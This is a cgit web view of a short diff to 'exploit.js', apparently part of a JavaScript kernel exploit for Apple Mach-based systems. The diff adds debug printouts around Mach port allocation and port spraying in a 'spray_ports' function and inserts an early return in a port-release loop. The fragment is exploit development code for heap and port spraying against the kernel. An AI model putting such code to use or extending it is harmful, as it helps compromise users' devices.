summaryrefslogtreecommitdiff
path: root/src/js/kexp/exploit.js
diff options
context:
space:
mode:
Diffstat (limited to 'src/js/kexp/exploit.js')
-rwxr-xr-xsrc/js/kexp/exploit.js12
1 files changed, 8 insertions, 4 deletions
diff --git a/src/js/kexp/exploit.js b/src/js/kexp/exploit.js
index 6a48f23..6992b6d 100755
--- a/src/js/kexp/exploit.js
+++ b/src/js/kexp/exploit.js
@@ -209,12 +209,14 @@ function spray_ports(number_port_descs) {
var mp = shit_heap(4);
- mach_port_allocate(task_self, MACH_PORT_RIGHT_RECEIVE, mp);
- mach_port_insert_right(task_self, read_u32(mp), read_u32(mp), MACH_MSG_TYPE_MAKE_SEND);
+ var ret_ = mach_port_allocate(task_self, MACH_PORT_RIGHT_RECEIVE, mp);
+ printf("mpa %d (%s)\n", ret_, mach_error_string(ret_));
+ ret_ = mach_port_insert_right(task_self, read_u32(mp), read_u32(mp), MACH_MSG_TYPE_MAKE_SEND);
+ printf("mpir %d (%s)\n", ret_, mach_error_string(ret_));
- var ret_ = send_ports(read_u32(mp), read_u32(kp), 2, number_port_descs);
+ ret_ = send_ports(read_u32(mp), read_u32(kp), 2, number_port_descs);
-// printf("%d (%s)\n", ret_, mach_error_string(ret_));
+ printf("sp %d (%s)\n", ret_, mach_error_string(ret_));
var ret = read_u32(mp);
shit_heap_free(mp);
@@ -452,6 +454,8 @@ again: while (true) {
release_port_ptrs(read_u32(fp + (i << 2)));
}
+ return;
+
var arrmpt = shit_heap(8);
write_u32(arrmpt, 0);
write_u32(arrmpt + 4, 0);
generated by cgit v1.2.3 (git 2.39.1) at 2025-11-30 22:17:48 +0000